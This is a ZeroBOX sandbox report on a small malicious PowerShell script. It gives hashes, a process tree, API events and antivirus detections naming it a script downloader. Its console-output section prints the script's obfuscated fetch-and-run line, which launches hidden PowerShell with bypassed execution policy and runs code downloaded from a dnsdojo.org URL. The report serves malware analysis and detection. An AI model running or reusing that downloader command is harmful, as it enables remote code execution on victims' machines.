Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 6, 2023, 10 a.m.	April 6, 2023, 10:02 a.m.

Size	776.0B
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`0a7ad1398074dada29acf86dcfc4bde1`
SHA256	`190f643e71380aad228e3b308fe0651aa86404873d1a245b4532c410080b4423`
CRC32	`01C9E946`
ssdeep	`24:fTTTTTTTTTjk5dRAmIDMLbffINr8bXqFuAgAzUIbT/PTC:fTTTTTTTTTj82msM3NauK9O`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\work.txt.ps1
3016
- replace.exe "C:\Windows\system32\replace.exe" "OEFpSleGvJLReEHDyCQdVRRvZddnYLfmOzaoMyfrleGvJnuIOcOyncGzVOkLzVOkL OEFpS w" leGvJ s
  2184
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" LReEH c
  2276
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" DyCQd r
  2356
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" VRRvZ i
  2428
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" ddnYL p
  1620
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" fmOza t
  1568
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" oMyfr .
  2540
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" nuIOc h
  1720
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" OyncG e
  1472
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced" zVOkL l
  2536
- replace.exe "C:\Windows\system32\replace.exe" "No files replaced"
  2660

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'Cr console_handle: 0x00000023	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: eateObject'. console_handle: 0x0000002f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\work.txt.ps1:1 char:4 console_handle: 0x0000003b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + Set <<<< trrmxvyb = CreateObject(Replace(Replace(Replace(Replace(Replace(Rep console_handle: 0x00000047	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: lace(Replace(Replace(Replace(Replace(Replace("OEFpSleGvJLReEHDyCQdVRRvZddnYLfmO console_handle: 0x00000053	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: zaoMyfrleGvJnuIOcOyncGzVOkLzVOkL", "OEFpS", "w"), "leGvJ", "s"), "LReEH", "c"), console_handle: 0x0000005f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: "DyCQd", "r"), "VRRvZ", "i"), "ddnYL", "p"), "fmOza", "t"), "oMyfr", "."), "nu console_handle: 0x0000006b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: IOc", "h"), "OyncG", "e"), "zVOkL", "l")) console_handle: 0x00000077	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x00000083	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: ndingException console_handle: 0x0000008f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000009b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: .Commands.SetVariableCommand console_handle: 0x000000a7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: The term 'ovmdokdh' is not recognized as the name of a cmdlet, function, script console_handle: 0x000000c7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was in console_handle: 0x000000d3	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: cluded, verify that the path is correct and try again. console_handle: 0x000000df	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\work.txt.ps1:2 char:9 console_handle: 0x000000eb	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + ovmdokdh <<<< = ("POWeRS") console_handle: 0x000000f7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + CategoryInfo : ObjectNotFound: (ovmdokdh:String) [], CommandNot console_handle: 0x00000103	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: FoundException console_handle: 0x0000010f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000011b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: The term 'trrmxvyb.Run' is not recognized as the name of a cmdlet, function, sc console_handle: 0x00000023	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: ript file, or operable program. Check the spelling of the name, or if a path wa console_handle: 0x0000002f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: s included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\work.txt.ps1:3 char:13 console_handle: 0x00000047	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + trrmxvyb.Run <<<< ((ovmdokdh)+"HeLL.eXe -WIND HIDDeN -eXeC BYPASS -NONI $SEYU console_handle: 0x00000053	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: SEHSEYH='IeX(NeW-OBJeCT NeT.W';$SEYSYSET='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sl console_handle: 0x0000005f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: eep 3;$HJDRRRUY='TUYDRDFDNYRDBBTRDVTDTNDRNJUYUMFUTDBT(''http://khalid.dnsdojo.o console_handle: 0x0000006b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: rg:81/dd/image.jpg'')'.RePLACe('TUYDRDFDNYRDBBTRDVTDTNDRNJUYUMFUTDBT','ADSTRING console_handle: 0x00000077	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: ');Sleep 1;IeX($SEYUSEHSEYH+$SEYSYSET+$HJDRRRUY);"), CONSOLE_HIDE, CMD_WAIT console_handle: 0x00000083	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + CategoryInfo : ObjectNotFound: (trrmxvyb.Run:String) [], Comman console_handle: 0x0000008f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: dNotFoundException console_handle: 0x0000009b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000a7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Set-Variable : A positional parameter cannot be found that accepts argument 'No console_handle: 0x000000c7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: thing'. console_handle: 0x000000d3	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\work.txt.ps1:4 char:4 console_handle: 0x000000df	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + Set <<<< ali = Nothing console_handle: 0x000000eb	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Set-Variable], ParameterBi console_handle: 0x000000f7	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: ndingException console_handle: 0x00000103	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell console_handle: 0x0000010f	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: .Commands.SetVariableCommand console_handle: 0x0000011b	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - s console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - c console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - r console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - i console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - p console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - t console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - . console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - h console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - e console_handle: 0x00000013	1	1
WriteConsoleW April 6, 2023, 10 a.m.	buffer: Invalid switch - l console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 6, 2023, 10 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057a7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 6, 2023, 10 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06570000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06591000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06592000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06593000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06561000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06594000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06595000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 6, 2023, 10 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

MicroWorld-eScan	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
FireEye	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
ALYac	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
VIPRE	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
Symantec	ISB.Downloader!gen80
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
Emsisoft	Heur.BZC.PZQ.Boxter.794.5D9AF6DB (B)
Arcabit	Heur.BZC.PZQ.Boxter.794.5D9AF6DB
ZoneAlarm	HEUR:Trojan.Script.Generic
MAX	malware (ai score=85)
AVG	Script:SNH-gen [Drp]

One or more non-whitelisted processes were created (11 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" nuIOc h
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" OyncG e
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" LReEH c
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" fmOza t
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" ddnYL p
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" zVOkL l
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" oMyfr .
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced"
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" DyCQd r
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "OEFpSleGvJLReEHDyCQdVRRvZddnYLfmOzaoMyfrleGvJnuIOcOyncGzVOkLzVOkL OEFpS w" leGvJ s
parent_process	powershell.exe	martian_process	"C:\Windows\system32\replace.exe" "No files replaced" VRRvZ i

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\replace.exe

work.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All